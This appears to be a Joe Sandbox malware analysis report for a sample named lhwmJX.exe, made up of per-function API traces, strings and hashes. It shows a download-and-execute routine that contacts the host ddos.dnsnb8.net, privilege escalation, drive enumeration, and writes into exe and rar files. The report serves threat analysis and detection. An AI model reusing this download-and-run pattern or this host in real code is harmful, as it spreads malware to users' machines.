String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: d888433a0dd25faae487f44976029922d2dd7b4854ceed95c1e11bd366918156
Instruction ID: fb132bad0913894936533bc7f7a46aa85185bc0fa7140d288752007fa47b7fd0
Opcode Fuzzy Hash: d888433a0dd25faae487f44976029922d2dd7b4854ceed95c1e11bd366918156
Instruction Fuzzy Hash: 344130B3404349AFD721DBA0DC89EDB77ECEB88715F04486DF945D3111EA35DA4887A2

Function 00BC1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894

WinExec.KERNEL32(?,00000005), ref: 00BC10F1
lstrlen.KERNEL32(00BC4748), ref: 00BC10FA
wsprintfA.USER32 ref: 00BC112A
wsprintfA.USER32 ref: 00BC1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00BC115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00BC1169
Sleep.KERNEL32 ref: 00BC1179

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC1119
%s%.8X.exe, xrefs: 00BC1124
cj/, xrefs: 00BC1135
http://%s:%d/%s/%s, xrefs: 00BC10C2, 00BC1141
ddos.dnsnb8.net, xrefs: 00BC10C8, 00BC10CF, 00BC1140, 00BC1168

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-4120842960
Opcode ID: 3f7c0b8390a3ca783807c8059a60885b2422cbbfd1b1005a8864199976c387ff
Instruction ID: 0c6e6267c391cba2905c15d3e4d8b2299985dd00c1a82e6630190015b41f9ca9
Opcode Fuzzy Hash: 3f7c0b8390a3ca783807c8059a60885b2422cbbfd1b1005a8864199976c387ff
Instruction Fuzzy Hash: 60216B76900248BFDB209BA4DC58FAEBBF8EB0A715F5584D9E500B3051DB749B848F60

Function 00BC1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00BC174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00BC177C
__aulldiv.LIBCMT ref: 00BC1796
__aulldiv.LIBCMT ref: 00BC17A8

Strings

Time, xrefs: 00BC173D, 00BC1766
SOFTWARE\GTplus, xrefs: 00BC1742, 00BC176B
C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC1722

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-599966548
Opcode ID: f630e8052ac2441b494d25c9e3cd6fa00a056d462aff203c913f37a7676324c1
Instruction ID: 3df50767389ab3f92fae3075c2d5b8493f817f4f726211983edb70a53736ee71
Opcode Fuzzy Hash: f630e8052ac2441b494d25c9e3cd6fa00a056d462aff203c913f37a7676324c1
Instruction Fuzzy Hash: 541163B2A00209BBDB109B94CC85FEF7BFCEB45B54F508559F900F6141D6719E458B60

Function 00BC6076 Relevance: 11.1, APIs: 7, Instructions: 615
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00BC60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BC60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BC6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC61A5

Memory Dump Source

Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 87e85f70df4a6cb74df87e3d6aa3945753eaa98a6f864b70057e537295339769
Instruction ID: 05dc4094916bf6706fa51509d8213fc8ca89b97d6df66d210b87324214132e49
Opcode Fuzzy Hash: 87e85f70df4a6cb74df87e3d6aa3945753eaa98a6f864b70057e537295339769
Instruction Fuzzy Hash: 6C1233B25087898FDB328F64CC85FEA7BF4EF12310F1845EED8859B292D674A901C765

Function 00BC2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BC2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00BC2BB4
GetDriveTypeA.KERNEL32(?), ref: 00BC2BD3
CreateThread.KERNEL32(00000000,00000000,00BC2B7D,?,00000000,00000000), ref: 00BC2BEE
lstrlen.KERNEL32(?), ref: 00BC2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00BC2C16
CreateThread.KERNEL32(00000000,00000000,00BC2845,00000000,00000000,00000000), ref: 00BC2C3A

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 0b923c25c796da2af4fd5547b29501488205831634a0d5d94268414d58b45474
Instruction ID: 091a0a2ffddc42c603e62a17c45954a44c2685b73b2d24f8768fa6585ef5adad
Opcode Fuzzy Hash: 0b923c25c796da2af4fd5547b29501488205831634a0d5d94268414d58b45474
Instruction Fuzzy Hash: 5D21C0B280014DAFEB20AF64AC84FAF7BEDFB08745B550529F842D3161DB308E06CB60

Function 00BC1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00BC32B0,00000164,00BC2986,?), ref: 00BC1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00BC1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00BC1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00BC1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00BC1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00BC201E
memset.MSVCRT ref: 00BC20D8
memset.MSVCRT ref: 00BC20EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22DD
WriteFile.KERNEL32(000000FF,00BC4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC2322
UnmapViewOfFile.KERNEL32(?,?,00BC32B0,00000164,00BC2986,?), ref: 00BC2340
CloseHandle.KERNEL32(?,?,00BC32B0,00000164,00BC2986,?), ref: 00BC234E
CloseHandle.KERNEL32(000000FF,?,00BC32B0,00000164,00BC2986,?), ref: 00BC2359

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3043204753-0
Opcode ID: 5b9ce0d6354b877828f0c7e41e10c30be18f5d2d1e33431fa56a4253a0afea17
Instruction ID: 04a200668e9ed95eae3dda46ff72a1e76800a68af671b8ea5fff98c5ffbea7f0
Opcode Fuzzy Hash: 5b9ce0d6354b877828f0c7e41e10c30be18f5d2d1e33431fa56a4253a0afea17
Instruction Fuzzy Hash: EEF12871900209AFDB20DFA8D881EADBBF5FF08314F10856EE51AA7661DB30AE51CF54

Function 00BC1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
Sleep.KERNEL32(00000064), ref: 00BC19C6
wsprintfA.USER32 ref: 00BC19EC
CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65
CloseHandle.KERNEL32(000000FF), ref: 00BC1A90
DeleteFileA.KERNEL32(?), ref: 00BC1AA7
VirtualFree.KERNEL32(00BC4E60,00000000,00008000), ref: 00BC1AC1

Strings

%s%.8X.data, xrefs: 00BC19E6
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC19DB
2, xrefs: 00BC19CF
C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC197C

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
API String ID: 716042067-2743700173
Opcode ID: 5bb2dae04baeb20c3e9f79518d5387bf748ed68e3cd225561df08a086f0616a4
Instruction ID: 14821862b03c770ce96660a32fb54951422aaf17615dbfd9cffe461872a206c2
Opcode Fuzzy Hash: 5bb2dae04baeb20c3e9f79518d5387bf748ed68e3cd225561df08a086f0616a4
Instruction Fuzzy Hash: FF515B71901219AFDB109F98CC84FAEBBF8EB0A754F5049ADF525F6191C7309E40CBA0

Function 00BC28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BC28D3
wsprintfA.USER32 ref: 00BC28F7
memset.MSVCRT ref: 00BC2925
wsprintfA.USER32 ref: 00BC2940

Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2A02
Part of subcall function 00BC29E2: wsprintfA.USER32 ref: 00BC2A1A
Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2A44
Part of subcall function 00BC29E2: lstrlen.KERNEL32(?), ref: 00BC2A54
Part of subcall function 00BC29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BC2A6C
Part of subcall function 00BC29E2: strrchr.MSVCRT ref: 00BC2A7C
Part of subcall function 00BC29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BC2A9F
Part of subcall function 00BC29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00BC2AAE
Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2AC6
Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2ADA
Part of subcall function 00BC29E2: FindFirstFileA.KERNEL32(?,?), ref: 00BC2AEF
Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2B13

strrchr.MSVCRT ref: 00BC2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00BC2974

Strings

rar, xrefs: 00BC2988
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC29B3
exe, xrefs: 00BC296D
%s%s, xrefs: 00BC28F1
%s\, xrefs: 00BC293A

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-4092107658
Opcode ID: 1eb0fe17bd3034ddd2d33169ad7a7ce8777525bfd54ad49be8b5b1fc7233c3d7
Instruction ID: 0c56521a5a1e3b9f523060104fb4cffd1bad2f7334c892c5597fa8a6a714c94a
Opcode Fuzzy Hash: 1eb0fe17bd3034ddd2d33169ad7a7ce8777525bfd54ad49be8b5b1fc7233c3d7
Instruction Fuzzy Hash: 3131A776A4030D6BDB20A764DC85FDA77ECEB15710F0444EAF945A7091EAF49AC48B60

Function 00BC1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00BC164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00BC165B
GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,00000104), ref: 00BC166E
CreateThread.KERNEL32(00000000,00000000,00BC1099,00000000,00000000,00000000), ref: 00BC16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00BC16BD

Part of subcall function 00BC139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC13BC
Part of subcall function 00BC139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BC13DA
Part of subcall function 00BC139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BC1448

lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC16E5

Strings

Documents and Settings, xrefs: 00BC1696
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC1644
C:\Windows\system32, xrefs: 00BC1656
C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC1662, 00BC1667, 00BC16DD

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3269788485
Opcode ID: ba44d8c163e7abd363f5cfd88dae470f818cc4911f2ac4d076b781a90b4ed921
Instruction ID: 9c9818a5dcfb318ff7332b960d36de10eca3401f2be682c004c2e301a3b864f9
Opcode Fuzzy Hash: ba44d8c163e7abd363f5cfd88dae470f818cc4911f2ac4d076b781a90b4ed921
Instruction Fuzzy Hash: CF11B9735412147BDB206BA99D4DFDB3EEDEB5B761F1044A9F209A2061CB718A40C7B1

Function 00BC1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00BC1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC108E

Strings

http://%s:%d/%s/%s, xrefs: 00BC1000
ddos.dnsnb8.net, xrefs: 00BC1026

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: af15dce3f2a6473452844c2cfd71a4ca65cf0bfb38e3cb344f397a6203292832
Instruction ID: 2ab4cf7a9d2c3ffbdd7580187a5b64a45e2b59774475996475ed0a4845922184
Opcode Fuzzy Hash: af15dce3f2a6473452844c2cfd71a4ca65cf0bfb38e3cb344f397a6203292832
Instruction Fuzzy Hash: 820184B210025CBFE7306F649C88F2BBBECEB44BA9F004929F245A3091DA705E448B74

Function 00BC2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BC2C57

Part of subcall function 00BC1973: PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
Part of subcall function 00BC1973: CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
Part of subcall function 00BC1973: Sleep.KERNEL32(00000064), ref: 00BC19C6
Part of subcall function 00BC1973: wsprintfA.USER32 ref: 00BC19EC
Part of subcall function 00BC1973: CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
Part of subcall function 00BC1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
Part of subcall function 00BC1973: GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
Part of subcall function 00BC1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
Part of subcall function 00BC1973: ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00BC2C99
WaitForMultipleObjects.KERNEL32(00000001,00BC16BA,00000001,000000FF,?,00BC16BA,00000000), ref: 00BC2CAC
VirtualFree.KERNEL32(008E0000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,00BC4E5C,00BC4E60,?,00BC16BA,00000000), ref: 00BC2CC2

Strings

C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC2C69

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
API String ID: 2042498389-3390243486
Opcode ID: abaf4ffafab02c0e0661b0d512f6008794c4b24c26b3a0c78c94704567b3c4c7
Instruction ID: 9ff08c84c1775bc82fb8f397d9325b3e13a93760c93f4e9006971df4f33e2634
Opcode Fuzzy Hash: abaf4ffafab02c0e0661b0d512f6008794c4b24c26b3a0c78c94704567b3c4c7
Instruction Fuzzy Hash: EF01DF726012207AD714ABA4DC1AFEF7EECEF05B20F408058B904D61D1DAA09A40C3F0

Function 00BC14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00BC1504
VirtualQuery.KERNEL32(00BC14E1,?,0000001C), ref: 00BC1525
ExitProcess.KERNEL32 ref: 00BC157A

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 97476ef189c7229bcb3ce5d4c59c2aa0c7f44aa0dd28f531d792be47bf7a2d15
Instruction ID: 7e87bdae122db52e1c3ec432fa2a7ec897ee019ed717d7b05e83abbb5578e21f
Opcode Fuzzy Hash: 97476ef189c7229bcb3ce5d4c59c2aa0c7f44aa0dd28f531d792be47bf7a2d15
Instruction Fuzzy Hash: 2B115E71900204DFCB10EFADA895F7977E8EB9A711B10847EF403E3252DB308E41ABA0

Function 00BC1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BC1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00BC1947

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 0fec96a97cc76ad7b5bb1ec36b29b27f3a0bd9c98cc139352299c53c0ca21118
Instruction ID: f801365a379909172d31017c07f06928a509f8053e2c4545e02fb26ce3ab1bbd
Opcode Fuzzy Hash: 0fec96a97cc76ad7b5bb1ec36b29b27f3a0bd9c98cc139352299c53c0ca21118
Instruction Fuzzy Hash: 2CF06832200209ABD760DE2ADC04FA777ECEB55761F00897EF556E1051EB70D646CBB0

Function 00BC6159 Relevance: 2.6, APIs: 2, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BC60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BC6189
